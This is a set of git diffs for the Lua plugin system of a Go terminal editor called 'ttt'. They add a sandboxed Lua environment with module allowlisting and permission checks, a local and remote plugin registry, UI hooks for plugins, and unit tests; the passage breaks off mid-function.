+}
+
+func (p *Plugin) CallRender(proxy *PanelProxy) error {
+	if p.State == nil || p.RenderFunc == nil {
+		return nil
+	}
+
+	ud := PushPanelProxy(p.State, proxy)
+	err := p.State.CallByParam(lua.P{
+		Fn:      p.RenderFunc,
+		NRet:    0,
+		Protect: true,
+	}, ud)
+	if err != nil {
+		p.LastError = err
+		slog.Error("plugin render error", "plugin", p.Name, "error", err)
+	}
+	return err
+}

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -29,9 +29,11 @@ type Plugin struct {
 	Enabled  bool
 	State    *lua.LState
 
-	SidebarTitle string
-	RenderFunc   *lua.LFunction
-	EventFunc    *lua.LFunction
+	SidebarTitle       string
+	SidebarMenuEntries []widgets.MenuEntry
+	SidebarMenuFunc    *lua.LFunction
+	RenderFunc         *lua.LFunction
+	EventFunc          *lua.LFunction
 
 	BottomTitle      string
 	BottomRenderFunc *lua.LFunction
@@ -44,6 +46,7 @@ type Plugin struct {
 	PostAsync       func(*PluginAsyncResult)
 	Log             func(level, message string)
 	ShowContextMenu func(entries []widgets.MenuEntry, x, y int, onCommand func(cmd string))
+	ShowInfoDialog  func(title string, entries []widgets.KeyValueEntry)
 	Borders         *term.BorderSet
 
 	Editor     EditorAPI
@@ -103,6 +106,12 @@ func (p *Plugin) Destroy() {
 	p.Log = nil
 	p.ShowContextMenu = nil
 	p.EventListeners = nil
+}
+
+func (p *Plugin) CallSidebarAction(cmd string) {
+	if p.SidebarMenuFunc != nil && p.State != nil {
+		p.CallLuaFunc(p.SidebarMenuFunc, lua.LString(cmd))
+	}
 }
 
 func (p *Plugin) DispatchEvent(name string, args ...lua.LValue) {

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -4,6 +4,8 @@ import (
 	"log/slog"
 	"path/filepath"
 
+	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/widgets"
 	lua "github.com/yuin/gopher-lua"
 )
 
@@ -38,9 +40,11 @@ type Plugin struct {
 	Commands          []PluginCommand
 	PluginKeybindings []PluginKeybinding
 
-	RequestRedraw func()
-	PostAsync     func(*PluginAsyncResult)
-	Log           func(level, message string)
+	RequestRedraw   func()
+	PostAsync       func(*PluginAsyncResult)
+	Log             func(level, message string)
+	ShowContextMenu func(entries []widgets.MenuEntry, x, y int, onCommand func(cmd string))
+	Borders         *term.BorderSet
 
 	Editor     EditorAPI
 	Filesystem FilesystemAPI
@@ -97,6 +101,7 @@ func (p *Plugin) Destroy() {
 	p.RequestRedraw = nil
 	p.PostAsync = nil
 	p.Log = nil
+	p.ShowContextMenu = nil
 	p.EventListeners = nil
 }
 

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -46,7 +46,8 @@ type Plugin struct {
 	PostAsync       func(*PluginAsyncResult)
 	Log             func(level, message string)
 	ShowContextMenu func(entries []widgets.MenuEntry, x, y int, onCommand func(cmd string))
-	ShowInfoDialog  func(title string, entries []widgets.KeyValueEntry)
+	ShowInfoDialog    func(title string, entries []widgets.KeyValueEntry)
+	ShowConfirmDialog func(message string, onConfirm func())
 	Borders         *term.BorderSet
 
 	Editor     EditorAPI
@@ -105,6 +106,7 @@ func (p *Plugin) Destroy() {
 	p.PostAsync = nil
 	p.Log = nil
 	p.ShowContextMenu = nil
+	p.ShowConfirmDialog = nil
 	p.EventListeners = nil
 }
 

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -7,9 +7,21 @@ import (
 	lua "github.com/yuin/gopher-lua"
 )
 
+type PluginCommand struct {
+	ID      string
+	Title   string
+	Handler *lua.LFunction
+}
+
+type PluginKeybinding struct {
+	Key     string
+	Command string
+}
+
 type Plugin struct {
 	Name     string
 	Dir      string
+	Repo     string
 	Manifest Manifest
 	Granted  PermissionSet
 	Enabled  bool
@@ -22,6 +34,9 @@ type Plugin struct {
 	BottomTitle      string
 	BottomRenderFunc *lua.LFunction
 	BottomEventFunc  *lua.LFunction
+
+	Commands          []PluginCommand
+	PluginKeybindings []PluginKeybinding
 
 	RequestRedraw func()
 	PostAsync     func(*PluginAsyncResult)
@@ -69,6 +84,8 @@ func (p *Plugin) Destroy() {
 	p.EventFunc = nil
 	p.BottomRenderFunc = nil
 	p.BottomEventFunc = nil
+	p.Commands = nil
+	p.PluginKeybindings = nil
 	p.RequestRedraw = nil
 	p.PostAsync = nil
 	p.EventListeners = nil

--- a/internal/plugin/registry.go
+++ b/internal/plugin/registry.go
@@ -67,6 +67,15 @@ func (r *Registry) SetEnabled(name string, enabled bool) {
 	}
 }
 
+func (r *Registry) Remove(name string) {
+	for i := range r.Entries {
+		if r.Entries[i].Name == name {
+			r.Entries = append(r.Entries[:i], r.Entries[i+1:]...)
+			return
+		}
+	}
+}
+
 func (r *Registry) AddOrUpdate(name, repo, version string, perms PermissionSet) {
 	entry := r.Find(name)
 	if entry != nil {

--- a/internal/plugin/registry.go
+++ b/internal/plugin/registry.go
@@ -1,0 +1,86 @@
+package plugin
+
+import (
+	"encoding/json"
+	"errors"
+	"os"
+)
+
+type RegistryEntry struct {
+	Name        string        `json:"name"`
+	Repo        string        `json:"repo,omitempty"`
+	Version     string        `json:"version"`
+	Enabled     bool          `json:"enabled"`
+	Permissions PermissionSet `json:"permissions"`
+}
+
+type Registry struct {
+	Entries []RegistryEntry
+	path    string
+}
+
+func LoadRegistry(path string) (*Registry, error) {
+	r := &Registry{path: path}
+
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if errors.Is(err, os.ErrNotExist) {
+			return r, nil
+		}
+		return nil, err
+	}
+
+	if err := json.Unmarshal(data, &r.Entries); err != nil {
+		return nil, err
+	}
+	return r, nil
+}
+
+func (r *Registry) Save() error {
+	data, err := json.MarshalIndent(r.Entries, "", "  ")
+	if err != nil {
+		return err
+	}
+	return os.WriteFile(r.path, data, 0644)
+}
+
+func (r *Registry) Find(name string) *RegistryEntry {
+	for i := range r.Entries {
+		if r.Entries[i].Name == name {
+			return &r.Entries[i]
+		}
+	}
+	return nil
+}
+
+func (r *Registry) UpdatePermissions(name string, perms PermissionSet) {
+	entry := r.Find(name)
+	if entry != nil {
+		entry.Permissions = perms
+	}
+}
+
+func (r *Registry) SetEnabled(name string, enabled bool) {
+	entry := r.Find(name)
+	if entry != nil {
+		entry.Enabled = enabled
+	}
+}
+
+func (r *Registry) AddOrUpdate(name, repo, version string, perms PermissionSet) {
+	entry := r.Find(name)
+	if entry != nil {
+		entry.Repo = repo
+		entry.Version = version
+		entry.Permissions = perms
+		entry.Enabled = true
+		return
+	}
+	r.Entries = append(r.Entries, RegistryEntry{
+		Name:        name,
+		Repo:        repo,
+		Version:     version,
+		Enabled:     true,
+		Permissions: perms,
+	})
+}

--- a/internal/plugin/registry_remote.go
+++ b/internal/plugin/registry_remote.go
@@ -1,0 +1,43 @@
+package plugin
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"time"
+)
+
+const DefaultRegistryURL = "https://raw.githubusercontent.com/eugenioenko/ttt-plugins/main/registry.json"
+
+type RemoteRegistryEntry struct {
+	Name        string `json:"name"`
+	Repo        string `json:"repo"`
+	Description string `json:"description"`
+	Author      string `json:"author"`
+}
+
+func FetchRemoteRegistry(url string) ([]RemoteRegistryEntry, error) {
+	client := &http.Client{Timeout: 10 * time.Second}
+	resp, err := client.Get(url)
+	if err != nil {
+		return nil, fmt.Errorf("fetch registry: %w", err)
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode != http.StatusOK {
+		return nil, fmt.Errorf("registry returned status %d", resp.StatusCode)
+	}
+
+	body, err := io.ReadAll(resp.Body)
+	if err != nil {
+		return nil, fmt.Errorf("read registry: %w", err)
+	}
+
+	var entries []RemoteRegistryEntry
+	if err := json.Unmarshal(body, &entries); err != nil {
+		return nil, fmt.Errorf("parse registry: %w", err)
+	}
+
+	return entries, nil
+}

--- a/internal/plugin/registry_test.go
+++ b/internal/plugin/registry_test.go
@@ -1,0 +1,90 @@
+package plugin
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestLoadRegistryMissing(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "plugins.ttt.json")
+	r, err := LoadRegistry(path)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(r.Entries) != 0 {
+		t.Errorf("expected empty registry, got %d entries", len(r.Entries))
+	}
+}
+
+func TestRegistryRoundTrip(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "plugins.ttt.json")
+	r := &Registry{path: path}
+	r.AddOrUpdate("test", "github.com/test/test", "1.0.0", PermissionSet{PanelSidebar: true})
+
+	if err := r.Save(); err != nil {
+		t.Fatalf("save error: %v", err)
+	}
+
+	r2, err := LoadRegistry(path)
+	if err != nil {
+		t.Fatalf("load error: %v", err)
+	}
+	if len(r2.Entries) != 1 {
+		t.Fatalf("expected 1 entry, got %d", len(r2.Entries))
+	}
+	if r2.Entries[0].Name != "test" {
+		t.Errorf("expected name test, got %s", r2.Entries[0].Name)
+	}
+	if !r2.Entries[0].Permissions.PanelSidebar {
+		t.Error("expected panel.sidebar to be true")
+	}
+}
+
+func TestRegistryFind(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "plugins.ttt.json")
+	r := &Registry{path: path}
+	r.AddOrUpdate("alpha", "", "1.0", PermissionSet{})
+	r.AddOrUpdate("beta", "", "2.0", PermissionSet{})
+
+	if r.Find("alpha") == nil {
+		t.Error("expected to find alpha")
+	}
+	if r.Find("gamma") != nil {
+		t.Error("expected nil for gamma")
+	}
+}
+
+func TestRegistrySetEnabled(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "plugins.ttt.json")
+	r := &Registry{path: path}
+	r.AddOrUpdate("test", "", "1.0", PermissionSet{})
+
+	r.SetEnabled("test", false)
+	entry := r.Find("test")
+	if entry.Enabled {
+		t.Error("expected disabled")
+	}
+}
+
+func TestRegistryUpdatePermissions(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "plugins.ttt.json")
+	r := &Registry{path: path}
+	r.AddOrUpdate("test", "", "1.0", PermissionSet{})
+
+	r.UpdatePermissions("test", PermissionSet{Commands: true})
+	entry := r.Find("test")
+	if !entry.Permissions.Commands {
+		t.Error("expected commands to be true after update")
+	}
+}
+
+func TestLoadRegistryInvalidJSON(t *testing.T) {
+	path := filepath.Join(t.TempDir(), "plugins.ttt.json")
+	os.WriteFile(path, []byte("not json"), 0644)
+
+	_, err := LoadRegistry(path)
+	if err == nil {
+		t.Fatal("expected error for invalid JSON")
+	}
+}

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -125,6 +125,22 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 			return 0
 		}))
 
+		L.SetField(mod, "log", L.NewFunction(func(L *lua.LState) int {
+			nargs := L.GetTop()
+			var level, message string
+			if nargs >= 2 {
+				level = L.CheckString(1)
+				message = L.CheckString(2)
+			} else {
+				level = "info"
+				message = L.CheckString(1)
+			}
+			if p.Log != nil {
+				p.Log(level, message)
+			}
+			return 0
+		}))
+
 		L.Push(mod)
 		return 1
 	}

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -172,6 +172,19 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 			return 0
 		}))
 
+		L.SetField(mod, "confirm", L.NewFunction(func(L *lua.LState) int {
+			message := L.CheckString(1)
+			callback := L.CheckFunction(2)
+			if p.ShowConfirmDialog != nil {
+				p.ShowConfirmDialog(message, func() {
+					if err := p.CallLuaFunc(callback); err != nil {
+						p.logError("confirm callback", err)
+					}
+				})
+			}
+			return 0
+		}))
+
 		L.Push(mod)
 		return 1
 	}

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -185,6 +185,75 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 			return 0
 		}))
 
+		L.SetField(mod, "open_drawer", L.NewFunction(func(L *lua.LState) int {
+			if err := p.Granted.Check("panel.drawer"); err != nil {
+				L.ArgError(1, "panel.drawer permission not granted")
+				return 0
+			}
+			tbl := L.CheckTable(1)
+			renderFunc, ok := L.GetField(tbl, "render").(*lua.LFunction)
+			if !ok {
+				L.ArgError(1, "render function required")
+				return 0
+			}
+			width := 40
+			minWidth := 20
+			if w := L.GetField(tbl, "width"); w != lua.LNil {
+				if n, ok := w.(lua.LNumber); ok {
+					width = int(n)
+				}
+			}
+			if mw := L.GetField(tbl, "min_width"); mw != lua.LNil {
+				if n, ok := mw.(lua.LNumber); ok {
+					minWidth = int(n)
+				}
+			}
+			if p.OpenDrawer != nil {
+				p.OpenDrawer(renderFunc, width, minWidth)
+			}
+			return 0
+		}))
+
+		L.SetField(mod, "close_drawer", L.NewFunction(func(L *lua.LState) int {
+			if p.CloseDrawer != nil {
+				p.CloseDrawer()
+			}
+			return 0
+		}))
+
+		L.SetField(mod, "open_tab", L.NewFunction(func(L *lua.LState) int {
+			if err := p.Granted.Check("panel.editor"); err != nil {
+				L.ArgError(1, "panel.editor permission not granted")
+				return 0
+			}
+			tbl := L.CheckTable(1)
+			title := "Plugin"
+			if t := L.GetField(tbl, "title"); t != lua.LNil {
+				title = t.String()
+			}
+			renderFunc, ok := L.GetField(tbl, "render").(*lua.LFunction)
+			if !ok {
+				L.ArgError(1, "render function required")
+				return 0
+			}
+			var eventFunc *lua.LFunction
+			if fn, ok := L.GetField(tbl, "on_event").(*lua.LFunction); ok {
+				eventFunc = fn
+			}
+			if p.OpenTab != nil {
+				p.OpenTab(title, renderFunc, eventFunc)
+			}
+			return 0
+		}))
+
+		L.SetField(mod, "close_tab", L.NewFunction(func(L *lua.LState) int {
+			id := L.CheckString(1)
+			if p.CloseTab != nil {
+				p.CloseTab(id)
+			}
+			return 0
+		}))
+
 		L.Push(mod)
 		return 1
 	}

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -74,6 +74,54 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 				}
 			}
 
+			commands := L.GetField(tbl, "commands")
+			if ct, ok := commands.(*lua.LTable); ok {
+				if err := p.Granted.Check("commands"); err != nil {
+					L.ArgError(1, "commands permission not granted")
+					return 0
+				}
+				ct.ForEach(func(_ lua.LValue, v lua.LValue) {
+					entry, ok := v.(*lua.LTable)
+					if !ok {
+						return
+					}
+					id := L.GetField(entry, "id")
+					title := L.GetField(entry, "title")
+					handler, hOk := L.GetField(entry, "handler").(*lua.LFunction)
+					if id == lua.LNil || title == lua.LNil || !hOk {
+						return
+					}
+					p.Commands = append(p.Commands, PluginCommand{
+						ID:      id.String(),
+						Title:   title.String(),
+						Handler: handler,
+					})
+				})
+			}
+
+			keybindings := L.GetField(tbl, "keybindings")
+			if kt, ok := keybindings.(*lua.LTable); ok {
+				if err := p.Granted.Check("keybindings"); err != nil {
+					L.ArgError(1, "keybindings permission not granted")
+					return 0
+				}
+				kt.ForEach(func(_ lua.LValue, v lua.LValue) {
+					entry, ok := v.(*lua.LTable)
+					if !ok {
+						return
+					}
+					key := L.GetField(entry, "key")
+					cmd := L.GetField(entry, "command")
+					if key == lua.LNil || cmd == lua.LNil {
+						return
+					}
+					p.PluginKeybindings = append(p.PluginKeybindings, PluginKeybinding{
+						Key:     key.String(),
+						Command: cmd.String(),
+					})
+				})
+			}
+
 			return 0
 		}))
 

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -3,9 +3,45 @@ package plugin
 import (
 	"fmt"
 
+	"github.com/eugenioenko/ttt/internal/markdown"
+	"github.com/eugenioenko/ttt/internal/term"
 	"github.com/eugenioenko/ttt/internal/widgets"
 	lua "github.com/yuin/gopher-lua"
 )
+
+// reverseStyleMap maps term.Style constants to plugin style name strings.
+var reverseStyleMap = map[term.Style]string{
+	term.StyleDefault:         "default",
+	term.StyleMuted:           "muted",
+	term.StyleBorder:          "border",
+	term.StyleSuccess:         "success",
+	term.StyleDanger:          "danger",
+	term.StyleWarning:         "warning",
+	term.StyleSidebarSelected: "selected",
+	term.StylePaletteItem:     "item",
+	term.StyleLineNumber:      "line",
+	term.StyleInput:           "input",
+	term.StyleHoverBold:       "bold",
+	term.StyleHoverCode:       "code",
+	term.StyleSyntaxComment:   "syntax_comment",
+	term.StyleSyntaxString:    "syntax_string",
+	term.StyleSyntaxKeyword:   "syntax_keyword",
+	term.StyleSyntaxNumber:    "syntax_number",
+	term.StyleSyntaxOperator:  "syntax_operator",
+	term.StyleSyntaxFunction:  "syntax_function",
+	term.StyleSyntaxType:      "syntax_type",
+	term.StyleSyntaxBuiltin:   "syntax_builtin",
+	term.StyleSyntaxVariable:  "syntax_variable",
+	term.StyleSyntaxTag:       "syntax_tag",
+	term.StyleSyntaxAttribute: "syntax_attribute",
+}
+
+func styleToName(s term.Style) string {
+	if name, ok := reverseStyleMap[s]; ok {
+		return name
+	}
+	return "default"
+}
 
 func NewSandbox() *lua.LState {
 	L := lua.NewState(lua.Options{SkipOpenLibs: true})
@@ -252,6 +288,24 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 				p.CloseTab(id)
 			}
 			return 0
+		}))
+
+		L.SetField(mod, "markdown", L.NewFunction(func(L *lua.LState) int {
+			text := L.CheckString(1)
+			rendered := markdown.Render(text)
+			result := L.NewTable()
+			for i, line := range rendered {
+				lineTable := L.NewTable()
+				for j, span := range line.Spans {
+					spanTable := L.NewTable()
+					L.SetField(spanTable, "text", lua.LString(span.Text))
+					L.SetField(spanTable, "style", lua.LString(styleToName(span.Style)))
+					lineTable.RawSetInt(j+1, spanTable)
+				}
+				result.RawSetInt(i+1, lineTable)
+			}
+			L.Push(result)
+			return 1
 		}))
 
 		L.Push(mod)

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -57,6 +57,23 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 				}
 			}
 
+			bottom := L.GetField(tbl, "bottom")
+			if bt, ok := bottom.(*lua.LTable); ok {
+				if err := p.Granted.Check("panel.bottom"); err != nil {
+					L.ArgError(1, "panel.bottom permission not granted")
+					return 0
+				}
+				if title := L.GetField(bt, "title"); title != lua.LNil {
+					p.BottomTitle = title.String()
+				}
+				if fn, ok := L.GetField(bt, "render").(*lua.LFunction); ok {
+					p.BottomRenderFunc = fn
+				}
+				if fn, ok := L.GetField(bt, "on_event").(*lua.LFunction); ok {
+					p.BottomEventFunc = fn
+				}
+			}
+
 			return 0
 		}))
 

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -83,10 +83,19 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 
 	L.PreloadModule("ttt", loader)
 
+	allowedModules := map[string]bool{
+		"ttt":        true,
+		"ttt.editor": true,
+		"ttt.fs":     true,
+		"ttt.system": true,
+		"ttt.net":    true,
+		"ttt.events": true,
+	}
+
 	origRequire := L.GetGlobal("require")
 	L.SetGlobal("require", L.NewFunction(func(L *lua.LState) int {
 		name := L.CheckString(1)
-		if name != "ttt" {
+		if !allowedModules[name] {
 			L.ArgError(1, fmt.Sprintf("module %q is not available", name))
 			return 0
 		}

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -3,6 +3,7 @@ package plugin
 import (
 	"fmt"
 
+	"github.com/eugenioenko/ttt/internal/widgets"
 	lua "github.com/yuin/gopher-lua"
 )
 
@@ -54,6 +55,12 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 				}
 				if fn, ok := L.GetField(st, "on_event").(*lua.LFunction); ok {
 					p.EventFunc = fn
+				}
+				if actions, ok := L.GetField(st, "actions").(*lua.LTable); ok {
+					p.SidebarMenuEntries = parseLuaMenuEntries(L, actions)
+				}
+				if fn, ok := L.GetField(st, "on_action").(*lua.LFunction); ok {
+					p.SidebarMenuFunc = fn
 				}
 			}
 
@@ -137,6 +144,30 @@ func setupTTTModule(L *lua.LState, p *Plugin) {
 			}
 			if p.Log != nil {
 				p.Log(level, message)
+			}
+			return 0
+		}))
+
+		L.SetField(mod, "show_info", L.NewFunction(func(L *lua.LState) int {
+			title := L.CheckString(1)
+			tbl := L.CheckTable(2)
+			var entries []widgets.KeyValueEntry
+			tbl.ForEach(func(_, v lua.LValue) {
+				row, ok := v.(*lua.LTable)
+				if !ok {
+					return
+				}
+				entry := widgets.KeyValueEntry{}
+				if k := L.GetField(row, "key"); k != lua.LNil {
+					entry.Key = k.String()
+				}
+				if val := L.GetField(row, "value"); val != lua.LNil {
+					entry.Value = val.String()
+				}
+				entries = append(entries, entry)
+			})
+			if p.ShowInfoDialog != nil {
+				p.ShowInfoDialog(title, entries)
 			}
 			return 0
 		}))

--- a/internal/plugin/sandbox.go
+++ b/internal/plugin/sandbox.go
@@ -1,0 +1,81 @@
+package plugin
+
+import (
+	"fmt"
+
+	lua "github.com/yuin/gopher-lua"
+)
+
+func NewSandbox() *lua.LState {
+	L := lua.NewState(lua.Options{SkipOpenLibs: true})
+
+	for _, pair := range []struct {
+		name string
+		fn   lua.LGFunction
+	}{
+		{lua.LoadLibName, lua.OpenPackage},
+		{lua.BaseLibName, lua.OpenBase},
+		{lua.TabLibName, lua.OpenTable},
+		{lua.StringLibName, lua.OpenString},
+		{lua.MathLibName, lua.OpenMath},
+	} {
+		L.Push(L.NewFunction(pair.fn))
+		L.Push(lua.LString(pair.name))
+		L.Call(1, 0)
+	}
+
+	for _, name := range []string{"dofile", "loadfile"} {
+		L.SetGlobal(name, lua.LNil)
+	}
+
+	return L
+}
+
+func setupTTTModule(L *lua.LState, p *Plugin) {
+	RegisterPanelType(L)
+
+	loader := func(L *lua.LState) int {
+		mod := L.NewTable()
+
+		L.SetField(mod, "register", L.NewFunction(func(L *lua.LState) int {
+			tbl := L.CheckTable(1)
+
+			sidebar := L.GetField(tbl, "sidebar")
+			if st, ok := sidebar.(*lua.LTable); ok {
+				if err := p.Granted.Check("panel.sidebar"); err != nil {
+					L.ArgError(1, "panel.sidebar permission not granted")
+					return 0
+				}
+				if title := L.GetField(st, "title"); title != lua.LNil {
+					p.SidebarTitle = title.String()
+				}
+				if fn, ok := L.GetField(st, "render").(*lua.LFunction); ok {
+					p.RenderFunc = fn
+				}
+				if fn, ok := L.GetField(st, "on_event").(*lua.LFunction); ok {
+					p.EventFunc = fn
+				}
+			}
+
+			return 0
+		}))
+
+		L.Push(mod)
+		return 1
+	}
+
+	L.PreloadModule("ttt", loader)
+
+	origRequire := L.GetGlobal("require")
+	L.SetGlobal("require", L.NewFunction(func(L *lua.LState) int {
+		name := L.CheckString(1)
+		if name != "ttt" {
+			L.ArgError(1, fmt.Sprintf("module %q is not available", name))
+			return 0
+		}
+		L.Push(origRequire)
+		L.Push(lua.LString(name))
+		L.Call(1, 1)
+		return 1
+	}))
+}

--- a/internal/plugin/sandbox_test.go
+++ b/internal/plugin/sandbox_test.go
@@ -1,0 +1,107 @@
+package plugin
+
+import (
+	"testing"
+
+	lua "github.com/yuin/gopher-lua"
+)
+
+func TestSandboxDangerousGlobalsRemoved(t *testing.T) {
+	L := NewSandbox()
+	defer L.Close()
+
+	for _, name := range []string{"dofile", "loadfile"} {
+		v := L.GetGlobal(name)
+		if v != lua.LNil {
+			t.Errorf("expected %s to be nil, got %s", name, v.Type().String())
+		}
+	}
+}
+
+func TestSandboxSafeModulesWork(t *testing.T) {
+	L := NewSandbox()
+	defer L.Close()
+
+	if err := L.DoString(`local x = string.format("hello %s", "world")`); err != nil {
+		t.Errorf("string.format should work: %v", err)
+	}
+	if err := L.DoString(`local t = {}; table.insert(t, 1)`); err != nil {
+		t.Errorf("table.insert should work: %v", err)
+	}
+	if err := L.DoString(`local x = math.floor(3.14)`); err != nil {
+		t.Errorf("math.floor should work: %v", err)
+	}
+}
+
+func TestSandboxRequireRestricted(t *testing.T) {
+	L := NewSandbox()
+	defer L.Close()
+
+	p := &Plugin{Granted: PermissionSet{PanelSidebar: true}}
+	setupTTTModule(L, p)
+
+	if err := L.DoString(`local ttt = require("ttt")`); err != nil {
+		t.Errorf("require ttt should work: %v", err)
+	}
+
+	if err := L.DoString(`require("os")`); err == nil {
+		t.Error("require os should fail")
+	}
+
+	if err := L.DoString(`require("io")`); err == nil {
+		t.Error("require io should fail")
+	}
+}
+
+func TestSandboxRegisterSidebar(t *testing.T) {
+	L := NewSandbox()
+	defer L.Close()
+
+	p := &Plugin{Granted: PermissionSet{PanelSidebar: true}}
+	setupTTTModule(L, p)
+
+	err := L.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			sidebar = {
+				title = "Test Panel",
+				render = function(panel) end,
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("register failed: %v", err)
+	}
+
+	if p.SidebarTitle != "Test Panel" {
+		t.Errorf("expected title 'Test Panel', got %q", p.SidebarTitle)
+	}
+	if p.RenderFunc == nil {
+		t.Error("expected render function to be set")
+	}
+}
+
+func TestSandboxRegisterWithoutPermission(t *testing.T) {
+	L := NewSandbox()
+	defer L.Close()
+
+	p := &Plugin{Granted: PermissionSet{}}
+	setupTTTModule(L, p)
+
+	err := L.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			sidebar = {
+				title = "Test Panel",
+				render = function(panel) end,
+			},
+		})
+	`)
+	if err == nil {
+		t.Fatal("expected error when panel.sidebar not granted")
+	}
+
+	if p.SidebarTitle != "" {
+		t.Error("title should not be set without permission")
+	}
+}

--- a/internal/plugin/sandbox_test.go
+++ b/internal/plugin/sandbox_test.go
@@ -105,3 +105,60 @@ func TestSandboxRegisterWithoutPermission(t *testing.T) {
 		t.Error("title should not be set without permission")
 	}
 }
+
+func TestSandboxRegisterBottom(t *testing.T) {
+	L := NewSandbox()
+	defer L.Close()
+
+	p := &Plugin{Granted: PermissionSet{PanelBottom: true}}
+	setupTTTModule(L, p)
+
+	err := L.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			bottom = {
+				title = "Output",
+				render = function(panel) end,
+				on_event = function(ev) end,
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("register bottom failed: %v", err)
+	}
+
+	if p.BottomTitle != "Output" {
+		t.Errorf("expected title 'Output', got %q", p.BottomTitle)
+	}
+	if p.BottomRenderFunc == nil {
+		t.Error("expected bottom render function to be set")
+	}
+	if p.BottomEventFunc == nil {
+		t.Error("expected bottom event function to be set")
+	}
+}
+
+func TestSandboxRegisterBottomWithoutPermission(t *testing.T) {
+	L := NewSandbox()
+	defer L.Close()
+
+	p := &Plugin{Granted: PermissionSet{PanelSidebar: true}}
+	setupTTTModule(L, p)
+
+	err := L.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			bottom = {
+				title = "Output",
+				render = function(panel) end,
+			},
+		})
+	`)
+	if err == nil {
+		t.Fatal("expected error when panel.bottom not granted")
+	}
+
+	if p.BottomTitle != "" {
+		t.Error("bottom title should not be set without permission")
+	}
+}

--- a/internal/plugin/sandbox_test.go
+++ b/internal/plugin/sandbox_test.go
@@ -38,10 +38,22 @@ func TestSandboxRequireRestricted(t *testing.T) {
 	defer L.Close()
 
 	p := &Plugin{Granted: PermissionSet{PanelSidebar: true}}
+	p.EventListeners = make(map[string][]*lua.LFunction)
 	setupTTTModule(L, p)
+	setupEditorModule(L, p)
+	setupFsModule(L, p)
+	setupSystemModule(L, p)
+	setupNetModule(L, p)
+	setupEventsModule(L, p)
 
 	if err := L.DoString(`local ttt = require("ttt")`); err != nil {
 		t.Errorf("require ttt should work: %v", err)
+	}
+
+	for _, mod := range []string{"ttt.editor", "ttt.fs", "ttt.system", "ttt.net", "ttt.events"} {
+		if err := L.DoString(`local m = require("` + mod + `")`); err != nil {
+			t.Errorf("require %s should work: %v", mod, err)
+		}
 	}
 
 	if err := L.DoString(`require("os")`); err == nil {

--- a/internal/plugin/test_helpers_test.go
+++ b/internal/plugin/test_helpers_test.go
@@ -1,0 +1,22 @@
+package plugin
+
+import (
+	lua "github.com/yuin/gopher-lua"
+)
+
+func newTestPluginBase(perms PermissionSet) (*Plugin, func()) {
+	p := &Plugin{
+		Name:    "test",
+		Granted: perms,
+	}
+	p.EventListeners = make(map[string][]*lua.LFunction)
+	L := NewSandbox()
+	p.State = L
+	setupTTTModule(L, p)
+	setupEditorModule(L, p)
+	setupFsModule(L, p)
+	setupSystemModule(L, p)
+	setupNetModule(L, p)
+	setupEventsModule(L, p)
+	return p, func() { L.Close() }
+}

--- a/internal/plugin/widget_builder.go
+++ b/internal/plugin/widget_builder.go
@@ -3,6 +3,7 @@ package plugin
 import (
 	"github.com/eugenioenko/ttt/internal/term"
 	"github.com/eugenioenko/ttt/internal/widgets"
+	"github.com/gdamore/tcell/v2"
 	lua "github.com/yuin/gopher-lua"
 )
 
@@ -61,6 +62,12 @@ func createWidget(desc WidgetDesc, p *Plugin) widgets.Widget {
 		return createVStackWidget(desc, p)
 	case WidgetBox:
 		return createBoxWidget(desc, p)
+	case WidgetScrollView:
+		return createScrollViewWidget(desc, p)
+	case WidgetHStack:
+		return createHStackWidget(desc, p)
+	case WidgetDivider:
+		return createDividerWidget(desc)
 	case WidgetDropdown:
 		return createDropdownWidget(desc, p)
 	}
@@ -95,12 +102,12 @@ func updateWidget(w widgets.Widget, desc WidgetDesc, p *Plugin) {
 				}
 			}
 			tw.SetItems(desc.Items)
-			tw.RestoreExpanded(expanded)
 			for _, item := range tw.Config.Items {
 				if expanded[item.ID] && item.Expandable {
 					item.Expanded = true
 				}
 			}
+			tw.RestoreExpanded(expanded)
 			wireTreeCallbacks(tw, desc, p)
 		}
 	case WidgetButton:
@@ -127,6 +134,36 @@ func updateWidget(w widgets.Widget, desc WidgetDesc, p *Plugin) {
 				}
 			}
 			vs.Children = children
+		}
+	case WidgetHStack:
+		if hs, ok := w.(*widgets.HStackWidget); ok {
